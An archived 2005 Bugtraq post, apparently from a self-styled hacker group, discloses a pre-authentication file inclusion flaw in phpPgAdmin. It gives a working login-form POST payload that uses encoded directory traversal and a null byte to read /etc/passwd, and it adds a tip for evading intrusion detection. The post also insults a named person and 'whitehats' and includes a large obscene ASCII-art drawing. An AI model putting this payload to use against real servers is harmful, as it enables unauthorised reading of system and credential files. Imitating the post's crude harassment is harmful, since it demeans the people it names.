lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Mon,  4 Jul 2005 19:24:37 -0700
From: <rznvynqqe@...hmail.com>
To: <bugtraq@...urityfocus.com>
Cc: dailydave@...ts.immunitysec.com
Subject: !!! pre-authenticated remote code inclusion
	vulnerability inside phppgadmin !!!


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

NOTE: this advisory complies with draft-christey-wysopal-vuln-
disclosure-00.txt

!!! pre-authenticated remote code inclusion vulnerability inside
phppgadmin !!!

What is this stuff?
        phpPgAdmin is a web-based administration tool for
PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting
services. phpPgAdmin is one of the best database front-ends
available.

you cant get this in stores man!

remote pre-auth file inclusion vulnerability brought to you by bad
method of data
usage, found by twigglestick (also known as vengeful striking
hammer of
god), massive 0day finding ALF member. Remember, DON'T USE THIS
VULNERABILITY TO BREAK
PORN SITES, PORN IS GOOD. ALSO ALL YOU WHITEHATS ARE BAD, VERY VERY
BAD. OK
THNX.

install phppgadmin (http://phppgadmin.sourceforge.net/)
post to login form
formUsername=username&formPassword=password&formServer=0&formLanguag
e=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/et
c/passwd%00&submitLogin=Login

*Remeber kiddies, many of stupid IDS will go off when you do this,
so change file!

and saying 'FUCK PETE SHIPLEY' while doing it.

remember programmer, don't include user input directly into the
code, its too easy
to make mistakes, think default deny policy for example, with
explicit allows.
this also is cross-site with server errors working, but we don't
care about that.

bye for now!

||     __ _  __  ||    <>   __            ___   __    _      ||  <>
 __  ||
||    /  \| / _] ||//     |//\\   /\||   | /\\ /  \ |/ \    _||
/ _] ||//
||/\  ||| | ||_  |<<   || ||  || <__||   | ]   |||| ||     /<>|  ||
||_  |<<
|| || \__/| \__] ||\\  || ||  || ___||   ||    \__/ ||     \__|  ||
\__] ||\\
                         SSSSSSSSSSSSSSSSSSS
                      SSSSSSSSSSSSSSSSSSSSSSSSS
                    SSSSSSSSSSSSSSSSSSSSSSSSSSSSS
                  SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
                 SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS
                SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS:SSSS
               SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS:::SSS
              SSSSSSSSSSSSSSSSSSSSSSSSSSSSSS::::::SS
              SSSSSSSSSSSSSSS:::::::::::::::::::::NS
              SSSSSSSSSSSSSS::nnnnnnn,::::::,nnnnnN
              SSSSSSSSSSSSS::':::::::::::::/:::::N
              SSSSSSSNNNNSS:::;oO@@Oo;::::::;oO@@n
              SSSSSSN::::SS::::::::::::::::::::::N
              SSSSSSN:::::::::::::::::::::::::::::N
               SSSSSSN::::::::::::::::::::::::::::N
                SSSSSSNN:::::::::::::::nNNn:::::::N
                 SSSSSS:N::::::::::::::::::::::::N
                  SSSSS:NN::::::::::::::::::::::N       /-----------
- ----------\
                  SSS::::NNN::::::::"NNNNNNN:::N  -----/ 0day give
me hard-on  \                    N:::::::NNN:::::::"NnnN:::N
\ wanna touch it?       /
N::::::::::NNN:::::::::::N          \---------------------/
                    NN::::::NN::::NNN:::::::N
                   NN::::::::NNN::::NNNNNNNN
                  N::::::::::::NN:::::::N
                NN::::::::::::::NN::::::N
             NNNN:::::::::::::::::N::::N
           NN::::::::::::::::::NNNNNN::N
         NN::::::::::::::::::::::::NNNNN
        N::::::::::::::::::::::::::::NNN
       N:::::::::::::::::::::::::::::::NN
      NN:::::::::::::::::::::::N:::::::::N
      N:::::::::::::::::::::::::N:::::::::N
      N:::::::::::::::::::::::::N::::::::::N
      N:::::::::::::::::::::::::N:::::::::::N
      NN::::::::::::::::::::::::N::::::::::::N
       N:::::::::::::::::::::::N::::::::::::::N
        N:::::::::::::::::::::N::::::::::::::::N
        NN::::::::::::::::::N:N::::::::::::::::N
        N:NN::::::::::::::NN::N::::::::::::::::N
        N:::N::::::::::::N:::::N:::::::::::::::N
       N:::::::::::::::NN::::::N::::::::::::::oo
       N::::::::::::::::::::::::N::::::::::::o@@
       N::::::::::::::::::::::::N:::::::::::No'
       N::::::::::::::::::::::::N::::::::NNNN
       N::::::::::::::::::::::::N:::::::N:::N
       N::::::::::::::::::::::::N::::::::::NN
       N::::::::::::::::::::::::N:::::::::::N
        N::::::::::::::::::::::N:::::N::::::N
NNNNNNNNNNNN
        N:::N::::::::::::::::::N::::N::::::N
N::::::::::::NN
         N:::N::::::::::::::::N:::::N::::N
NNNN:::::NNNNNNNNNN
        N:::N::::::::::::::NNN::::::N::::N
N::::::::::::::NN

N:::N::::::::::::::::NN::::::N:::NNNNNNNNNNNNNNNNNN:::::::::::()::NN

N:::N:::::::::::::::::NNNNNNNNNNN::::::::::::::::::::::::::::::NNN

N::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::()::NN

N::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::NNN

N::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::()::NN

N::::::N::::::::NNNN::::::::::::::::::::::::NNNN::::::::::::::::NNN

N:::::::N::::::::::::NNNNNNN::::::::::NNNNNNN:::::::::::::::::()::NN

N::::::::N::::::::::::::::::NNNNNNNNNN:::::::::::::::::::::::::::NN

N:::::::::NN:::::::::::::::::::::::::::::::NNNNNNNNNNNNNNNNNNNNNNN
        N:::::::::::NN::::::::::::::::::::::NNNNNNN      NNNNN
         N::::::::::::::::::::::::::NNNNNNNN           NN:::::0
          NNN::::::::::::NNNNNNNNNNN:::::::N          N><::::::N
           N:NNNNNNNNNNNN::::::::::::::::::N        NN::><:::::N
          N:::::::::::::::::::::::::::::::N       NN:::::><:::N
         N::::::::::::::::::::::::::::::::N     NN::::::::><NN
        N::::::::::::::::::::::::::::::::N    NN:::::::::NN
       N:::::::::::::::::::::::::::::::::N# NN:::::::::NN
      N::::::::::::::::::::::::::::::::::N##:::::::::NN
      N::::::::::::::::::::::::::::::::::N####:::::NN
      N:::::::::::N::::::::::::::::::::::N####:::NN
      N:::::::::::NN:::::::::::::::::::::N####:NN
      N:::::::::::NNN:::::::::::::::::::NN####N
      N:::::::::::NN:N::::::::::::::::::N######
      N:::::::::::N:::::::::::::::::::::N!#####
       N:::::::::N::::::::::::::::::::::N!!###N
       N::::::::::::::::::::::::::::::::N!!###NN
        N::::::::::::::::::::::::::::::::N!!!!!NN
        NN:::::::::::::::::::::::::::::::N!!!!!N:N
         NN::::::::::::::::::::::::::::::N!!!!!!N:N
          NNN::::::::::::::::::::::::::::N!!!!!!N::N
           NN:::::::::::::::::::::::::::::N!!!!!N:::N
            N:::::::::::::::::::::::::::::N!!!!!!N:::N
            N:::::::::::::::::::::::::::::N!!!!!!:::::N
            N:::::::::::::::::::::::::::::N!!!!!N::::::N
            N:::::::::::::::::::::::::::::N!!!!!N:::::::N
            N:::::::::::::::::::::::::::::N!!!!N:::::::::N
            N:::::::::::::::::::::::::::::NNNNN:::::::::::N
            N::::::::::::::::::::::::::::N:::::::::::::::::N
            N::::::::::::::::::::::::::::N::::::::::::::::::N
            N::::::::::::::::::::::::::::N:::::::::::::::::::N
            N:::::::::::N::::::::::::::::N::::::::::::::::::::N
            N::::::::::N:::::::::::::::::NN::::::::::::::::::::N
            N::::::::::N:::::::::::::::::NNN::::::::::::::::::::N
            N::::::::::N:::::::::::::::::N:NN::::::::::::::::::::N
            N::::::::::N::::::::::::::::N::::NN:::::::::::::::::::N


-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkLJ4c0ACgkQZvG4N6tdg63x2gCfYBjgFnFRU6EyEVRQ4IFnm9iLfLoA
nAi4IBh+YFO5EaG2iAaB8LFf6Oxx
=hxv0
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
secure FREE email: http://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
http://www.hushmail.com/services-messenger?l=434

Promote security and make money with the Hushmail Affiliate Program: 
http://www.hushmail.com/about-affiliate?l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ